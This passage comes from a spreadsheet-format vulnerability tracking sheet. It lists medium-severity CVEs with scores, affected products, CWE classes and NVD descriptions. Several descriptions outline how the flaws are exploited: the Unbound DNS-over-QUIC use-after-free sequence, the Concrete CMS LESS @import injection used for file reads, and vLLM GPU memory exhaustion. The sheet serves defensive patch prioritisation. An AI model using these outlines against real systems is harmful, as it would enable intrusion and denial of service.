      <c r="O901" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P901" s="5" t="inlineStr"/>
      <c r="Q901" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R901" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67369</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B902" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67383</t>
        </is>
      </c>
      <c r="D902" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E902" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F902" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G902" s="5" t="inlineStr"/>
      <c r="H902" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I902" s="5" t="inlineStr"/>
      <c r="J902" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K902" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L902" s="5" t="inlineStr"/>
      <c r="M902" s="5" t="inlineStr"/>
      <c r="N902" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O902" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P902" s="5" t="inlineStr"/>
      <c r="Q902" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="R902" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67383</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B903" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67386</t>
        </is>
      </c>
      <c r="D903" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E903" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F903" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G903" s="5" t="inlineStr"/>
      <c r="H903" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I903" s="5" t="inlineStr"/>
      <c r="J903" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K903" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L903" s="5" t="inlineStr"/>
      <c r="M903" s="5" t="inlineStr"/>
      <c r="N903" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O903" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P903" s="5" t="inlineStr"/>
      <c r="Q903" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R903" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67386</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B904" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67633</t>
        </is>
      </c>
      <c r="D904" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E904" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F904" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G904" s="5" t="inlineStr"/>
      <c r="H904" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I904" s="5" t="inlineStr"/>
      <c r="J904" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K904" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L904" s="5" t="inlineStr"/>
      <c r="M904" s="5" t="inlineStr"/>
      <c r="N904" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O904" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P904" s="5" t="inlineStr"/>
      <c r="Q904" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R904" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67633</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B905" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69147</t>
        </is>
      </c>
      <c r="D905" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E905" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F905" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G905" s="5" t="inlineStr"/>
      <c r="H905" s="5" t="inlineStr"/>
      <c r="I905" s="5" t="inlineStr"/>
      <c r="J905" s="5" t="inlineStr"/>
      <c r="K905" s="5" t="inlineStr"/>
      <c r="L905" s="5" t="inlineStr"/>
      <c r="M905" s="5" t="inlineStr"/>
      <c r="N905" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O905" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P905" s="5" t="inlineStr"/>
      <c r="Q905" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R905" s="5" t="inlineStr">
        <is>
          <t>vLLM is an inference and serving engine for large language models. Prior to 0.28.0, request bodies for Chat Completions and Responses can set media_io_kwargs.video.video_backend to pynvvideocodec, and MediaConnector.fetch_video forwards that choice to VideoMediaIO even when startup configuration selected a software decoder. The engine's _reserve_mm_ipc_gpu_memory logic budgets decoder memory only from static configuration, so the request-selected VIDEO_LOADER_REGISTRY backend can create a CUDA context, decoder surfaces, and decoded-frame allocations that were not removed from the engine's KV-cache budget. An attacker able to submit video requests to a video-capable GPU deployment with PyNvVideoCodec installed can exhaust shared GPU memory, causing request failures, worker crashes, or denial of service. The first release containing the fix is version 0.28.0.</t>
        </is>
      </c>
      <c r="S905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69147</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B906" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69839</t>
        </is>
      </c>
      <c r="D906" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E906" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F906" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G906" s="5" t="inlineStr"/>
      <c r="H906" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I906" s="5" t="inlineStr"/>
      <c r="J906" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K906" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L906" s="5" t="inlineStr"/>
      <c r="M906" s="5" t="inlineStr"/>
      <c r="N906" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O906" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P906" s="5" t="inlineStr"/>
      <c r="Q906" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R906" s="5" t="inlineStr">
        <is>
          <t>Uncaught exception in Windows iSCSI Target Service allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69839</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B907" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70019</t>
        </is>
      </c>
      <c r="D907" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E907" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F907" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G907" s="5" t="inlineStr"/>
      <c r="H907" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I907" s="5" t="inlineStr"/>
      <c r="J907" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K907" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L907" s="5" t="inlineStr"/>
      <c r="M907" s="5" t="inlineStr"/>
      <c r="N907" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O907" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P907" s="5" t="inlineStr"/>
      <c r="Q907" s="5" t="inlineStr">
        <is>
          <t>CWE-65</t>
        </is>
      </c>
      <c r="R907" s="5" t="inlineStr">
        <is>
          <t>Windows hard link in Windows Compressed Folder allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70019</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B908" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75880</t>
        </is>
      </c>
      <c r="D908" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E908" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F908" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G908" s="5" t="inlineStr"/>
      <c r="H908" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I908" s="5" t="inlineStr"/>
      <c r="J908" s="5" t="inlineStr"/>
      <c r="K908" s="5" t="inlineStr">
        <is>
          <t>apache:artemis</t>
        </is>
      </c>
      <c r="L908" s="5" t="inlineStr"/>
      <c r="M908" s="5" t="inlineStr"/>
      <c r="N908" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O908" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P908" s="5" t="inlineStr"/>
      <c r="Q908" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R908" s="5" t="inlineStr">
        <is>
          <t>An authenticated client could attach a consumer with a selector containing crafted wildcard usage that results in excessive evaluation during message delivery attempts, occupying a shared broker thread and leading to denial of service.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes this issue.</t>
        </is>
      </c>
      <c r="S908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75880</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B909" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76438</t>
        </is>
      </c>
      <c r="D909" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E909" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F909" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G909" s="5" t="inlineStr"/>
      <c r="H909" s="5" t="inlineStr"/>
      <c r="I909" s="5" t="inlineStr"/>
      <c r="J909" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K909" s="5" t="inlineStr"/>
      <c r="L909" s="5" t="inlineStr"/>
      <c r="M909" s="5" t="inlineStr"/>
      <c r="N909" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O909" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P909" s="5" t="inlineStr"/>
      <c r="Q909" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R909" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco BroadWorks CommPilot Application Software could allow an authenticated, remote attacker with low privileges to alter configurations on an affected device.
This vulnerability is due to missing authorization checks. An attacker could exploit this vulnerability by sending a crafted HTTP request.&amp;nbsp;A successful exploit could allow the attacker to alter configurations on select pages.</t>
        </is>
      </c>
      <c r="S909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76438</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B910" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78227</t>
        </is>
      </c>
      <c r="D910" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E910" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F910" s="5" t="inlineStr">
        <is>
          <t>sep@nlnetlabs.nl</t>
        </is>
      </c>
      <c r="G910" s="5" t="inlineStr"/>
      <c r="H910" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I910" s="5" t="inlineStr"/>
      <c r="J910" s="5" t="inlineStr"/>
      <c r="K910" s="5" t="inlineStr"/>
      <c r="L910" s="5" t="inlineStr"/>
      <c r="M910" s="5" t="inlineStr"/>
      <c r="N910" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O910" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P910" s="5" t="inlineStr"/>
      <c r="Q910" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R910" s="5" t="inlineStr">
        <is>
          <t>NLnet Labs Unbound 1.22.0 up to and including 1.26.1, has a use-after-free vulnerability when compiled for DNS-over-QUIC support with '--with-libngtcp2'. Each DoQ stream owns an output buffer that holds the DNS response. ngtcp2's retransmission buffer keeps a shallow pointer into the output buffer for as long as a STREAM frame may be resent. On a client RESET_STREAM, the output buffer is freed but ngtcp2 still holds the matching retransmission entries. The next PTO timeout makes ngtcp2 re-encode the STREAM frame and copy from the freed buffer. A malicious actor that can query Unbound over DoQ and that withholds ACKs, sends RESET_STREAM, and waits for PTO, reaches this use-after-free with no privilege. This leads to retransmissions against freed memory and eventually an abnormal server exit under a 20-query spray.</t>
        </is>
      </c>
      <c r="S910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78227</t>
        </is>
      </c>
    </row>
    <row r="911">
      <c r="A911" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B911" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79725</t>
        </is>
      </c>
      <c r="D911" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E911" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F911" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G911" s="5" t="inlineStr"/>
      <c r="H911" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I911" s="5" t="inlineStr"/>
      <c r="J911" s="5" t="inlineStr"/>
      <c r="K911" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L911" s="5" t="inlineStr"/>
      <c r="M911" s="5" t="inlineStr"/>
      <c r="N911" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O911" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P911" s="5" t="inlineStr"/>
      <c r="Q911" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R911" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to read arbitrary files due to improper access control.</t>
        </is>
      </c>
      <c r="S911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79725</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B912" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80126</t>
        </is>
      </c>
      <c r="D912" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E912" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F912" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G912" s="5" t="inlineStr"/>
      <c r="H912" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I912" s="5" t="inlineStr"/>
      <c r="J912" s="5" t="inlineStr"/>
      <c r="K912" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L912" s="5" t="inlineStr"/>
      <c r="M912" s="5" t="inlineStr"/>
      <c r="N912" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O912" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P912" s="5" t="inlineStr"/>
      <c r="Q912" s="5" t="inlineStr">
        <is>
          <t>CWE-667</t>
        </is>
      </c>
      <c r="R912" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Locking vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to filesystem access for attacker.</t>
        </is>
      </c>
      <c r="S912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80126</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B913" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80378</t>
        </is>
      </c>
      <c r="D913" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E913" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F913" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G913" s="5" t="inlineStr"/>
      <c r="H913" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I913" s="5" t="inlineStr"/>
      <c r="J913" s="5" t="inlineStr"/>
      <c r="K913" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L913" s="5" t="inlineStr"/>
      <c r="M913" s="5" t="inlineStr"/>
      <c r="N913" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O913" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P913" s="5" t="inlineStr"/>
      <c r="Q913" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R913" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service due to improper authorization.</t>
        </is>
      </c>
      <c r="S913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80378</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B914" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81554</t>
        </is>
      </c>
      <c r="D914" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E914" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F914" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G914" s="5" t="inlineStr"/>
      <c r="H914" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I914" s="5" t="inlineStr"/>
      <c r="J914" s="5" t="inlineStr"/>
      <c r="K914" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L914" s="5" t="inlineStr"/>
      <c r="M914" s="5" t="inlineStr"/>
      <c r="N914" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O914" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P914" s="5" t="inlineStr"/>
      <c r="Q914" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R914" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information due to an absolute-path traversal vulnerability.</t>
        </is>
      </c>
      <c r="S914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81554</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B915" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81910</t>
        </is>
      </c>
      <c r="D915" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E915" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F915" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G915" s="5" t="inlineStr"/>
      <c r="H915" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I915" s="5" t="inlineStr"/>
      <c r="J915" s="5" t="inlineStr"/>
      <c r="K915" s="5" t="inlineStr">
        <is>
          <t>concretecms:concrete_cms</t>
        </is>
      </c>
      <c r="L915" s="5" t="inlineStr"/>
      <c r="M915" s="5" t="inlineStr"/>
      <c r="N915" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O915" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P915" s="5" t="inlineStr"/>
      <c r="Q915" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R915" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS 9 through 9.5.2 is vulnerable to Server-Side Template Injection (SSTI) in Theme Customizer via Unvalidated Style Values. Values submitted through the customizer (color channels and other style properties handled by ColorStyle and sibling Style classes such as FontFamilyStyle and ImageStyle) are interpolated into server-compiled LESS source without neutralization of LESS syntax, allowing a user with the Theme Customization permission to inject arbitrary LESS directives. By injecting the @import (inline) directive, an attacker can read arbitrary files on the server and reach internal network resources through PHP stream wrappers. The compiled output, including any disclosed file contents, is written to the site's publicly served CSS cache, exposing database credentials, private keys, and other application secrets, and enabling server-side request forgery. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.9 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori from Tenzai for reporting.</t>
        </is>
      </c>
      <c r="S915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81910</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B916" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82059</t>
        </is>
      </c>
      <c r="D916" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E916" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F916" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G916" s="5" t="inlineStr"/>
      <c r="H916" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I916" s="5" t="inlineStr"/>
      <c r="J916" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K916" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L916" s="5" t="inlineStr"/>
      <c r="M916" s="5" t="inlineStr"/>
      <c r="N916" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O916" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P916" s="5" t="inlineStr"/>
      <c r="Q916" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R916" s="5" t="inlineStr">
        <is>
          <t>An internal aggregation expression in MongoDB Server was incorrectly registered as accessible to any authenticated user rather than being restricted to internal cluster operations. By crafting a malformed index specification within this expression, an authenticated user with read-only privileges could trigger an assertion failure in the index key generation code path. In certain build configurations, this assertion failure results in termination of the mongod process, causing a denial of service to all connected clients.</t>
        </is>
      </c>
      <c r="S916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82059</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B917" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82069</t>
        </is>
      </c>
      <c r="D917" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E917" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F917" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G917" s="5" t="inlineStr"/>
      <c r="H917" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I917" s="5" t="inlineStr"/>
      <c r="J917" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K917" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L917" s="5" t="inlineStr"/>
      <c r="M917" s="5" t="inlineStr"/>
      <c r="N917" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
